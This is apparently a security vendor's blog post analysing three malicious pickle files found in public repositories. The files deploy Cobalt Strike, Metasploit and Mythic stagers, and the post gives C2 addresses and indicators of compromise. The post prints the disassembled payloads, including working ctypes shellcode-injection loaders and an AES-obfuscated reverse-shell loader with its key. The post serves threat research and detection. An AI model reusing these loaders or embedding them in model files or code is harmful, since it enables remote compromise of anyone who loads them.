In our previous blog post, “Weaponizing Machine Learning Models with Ransomware”, we uncovered how malware can be surreptitiously embedded in ML models and automatically executed using standard data deserialization libraries – namely pickle.
Shortly after publishing, several people got in touch to see if we had spotted adversaries abusing the pickle format to deploy malware – and as it transpires, we have.
In this supplementary blog, we look at three malicious pickle files used to deploy Cobalt Strike, Metasploit and Mythic respectively, with each uploaded to public repositories in recent months. We provide a brief analysis on these files to show how this attack vector is being actively exploited in the wild.
Cobalt Strike Stager
The first malicious pickle file (serialized with pickle protocol version 3) was uploaded in January 2022 and uses the built-in Python exec function to execute an embedded Python script. The script relies on the ctypes library to invoke Windows APIs such as VirtualAlloc and CreateThread. In this way, it injects and runs a 64-bit Cobalt Strike stager shellcode.
We’ve used a simple pickle “disassembler” based on code from Kaitai Struct (http://formats.kaitai.io/python_pickle/) to highlight the opcodes used to execute each payload:
\x80 proto: 3 \x63 global_opcode: builtins exec \x71 binput: 0 \x58 binunicode: import ctypes,urllib.request,codecs,base64 AbCCDeBsaaSSfKK2 = "WEhobVkxeDRORGhj" // shellcode, truncated for readability AbCCDe = base64.b64decode(base64.b64decode(AbCCDeBsaaSSfKK2)) AbCCDe =codecs.escape_decode(AbCCDe) AbCCDe = bytearray(AbCCDe) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(AbCCDe)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(AbCCDe)).from_buffer(AbCCDe) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(AbCCDe))) handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1)) \x71 binput: 1 \x85 tuple1 \x71 binput: 2 \x52 reduce \x71 binput: 3 \x2e stop
The base64 encoded shellcode from this sample connects to https://121.199.68[.]210/Swb1 with a unique User-Agent string Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP09; NP09; MAAU)
The IP hardcoded in this shellcode appears in various intel feeds in relation to CobaltStrike activity; a few different CobaltStrike stagers were spotted talking to this IP, and a beacon DLL, which used to be hosted there at some point, features a watermark that is associated with many cybercriminal groups, including TrickBot/SmokeLoader, Nobelium, and APT29.
The second sample (serialized using pickle protocol version 4) appeared in the wild in July 2022. It’s rather similar to the first one in the way it uses the ctypes library to load and execute a 32-bit Cobalt Strike stager shellcode.
\x80 proto: 4 \x95 frame: 5397 \x8c short_binunicode: builtins \x94 memoize \x8c short_binunicode: exec \x94 memoize \x93 stack_global \x94 memoize \x58 binunicode: import base64 import ctypes import codecs shellcode= "" // removed for readability shellcode = base64.b64decode(shellcode) shellcode = codecs.escape_decode(shellcode) shellcode = bytearray(shellcode) ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1)) \x94 memoize \x85 tuple1 \x94 memoize \x52 reduce \x94 memoize \x2e stop
In this case, the shellcode connects to 43.142.60[.]207:9091/7Iyc with the User-Agent set to Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
The hardcoded IP address was recently mentioned in the Team Cymru report on Mythic C2 framework. Mythic is a Python-based post-exploitation red teaming platform and an open source alternative to Cobalt Strike. By pivoting on the E-Tag value that is present in HTTP headers of Mythic-related requests, Team Cymru researchers were able to find a list of IPs that are likely related to Mythic – and this IP was one of them.
What’s interesting is that just over 4 months ago (August 2022) Mythic introduced a pickle wrapper module that allows for the C2 agent to be injected into a pickle-serialized machine learning model! This means that some pentesting exercises already consider ML models as an attack vector. However, Mythic is known to be used not only in red teaming activities, but also by some notorious cybercriminal groups, and has been recently spotted in connection to a 2022 campaign targeting Pakistani and Turkish government institutions, as well as spreading BazarLoader malware.
This sample appeared under the name of favicon.ico in mid-November 2022, and features a bit more obfuscation than the previous two samples. The shellcode injection function is encrypted with AES-ECB with a hardcoded passphrase hello_i_4m_cc_12. The shellcode itself is computed using an arithmetic operation on a large int value and contains a Metasploit reverse-tcp shell that connects to a hardcoded IP 188.8.131.52 on port 6666.
\x80 proto: 3 \x63 global_opcode: builtins exec \x71 binput: 0 \x58 binunicode: import subprocess import os import time from Crypto.Cipher import AES import base64 from Crypto.Util.number import * import random while True: ret = subprocess.run("ping baidu.com -n 1", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if ret.returncode==0: key=b'hello_i_4m_cc_12' a2=b'p5uzeWCm6STXnHK3 [...]' // truncated for readability enc=base64.b64decode(a2) ae=AES.new(key,AES.MODE_ECB) num2=9287909549576993 [...] // truncated for readability num1=(num2//888-777)//666 buf=long_to_bytes(num1) exec(ae.decrypt(enc)) elif ret.returncode==1: time.sleep(60) \x71 binput: 1 \x85 tuple1 \x71 binput: 2 \x52 reduce \x71 binput: 3 \x2e stop
The decrypted injection code is very much the same as observed previously, with Windows APIs being invoked through the ctypes library to inject the payload into executable memory and run it via a new thread.
import ctypes shellcode = bytearray(buf) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode))) handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c
The decoded shellcode turns out to be a 64-bit reverse-tcp stager:
The hardcoded IP address is located in China and was acting as a Cobalt Strike C2 server as late as of October 2022, according to multiple Cobalt Strike trackers.
Although we can’t be 100% sure that the described malicious pickle files have been used in real-world attacks (as we lack enough contextual information), our findings definitively prove that the adversaries are already looking into this attack vector as a method of malware deployment. The IP addresses hardcoded in the above samples have been used in other in-the-wild malware, including various instances of Cobalt Strike and Mythic stagers, suggesting that these pickle-serialized shellcodes were not part of a legitimate research or a red teaming activity. As some of the post-exploitation and so-called “adversary emulation” frameworks are starting to build support for this attack vector, it’s only a matter of time until we see such attacks on the rise.
We’ve put together a set of YARA rules to detect malicious/suspicious pickle files which can be found in HiddenLayer’s public BitBucket repository.
For more information on how model injection works, what are the possible case scenarios and consequences, and how can we mitigate the risks – check out our detailed blog on Weaponizing Machine Learning Models.
Indicators of Compromise
|391f5d0cefba81be3e59e7b029649dfb32ea50f72c4d51663117fdd4d5d1e176||SHA256||Cobalt Strike Stager|
|121.199.68[.]210||IP||Cobalt Strike Stager|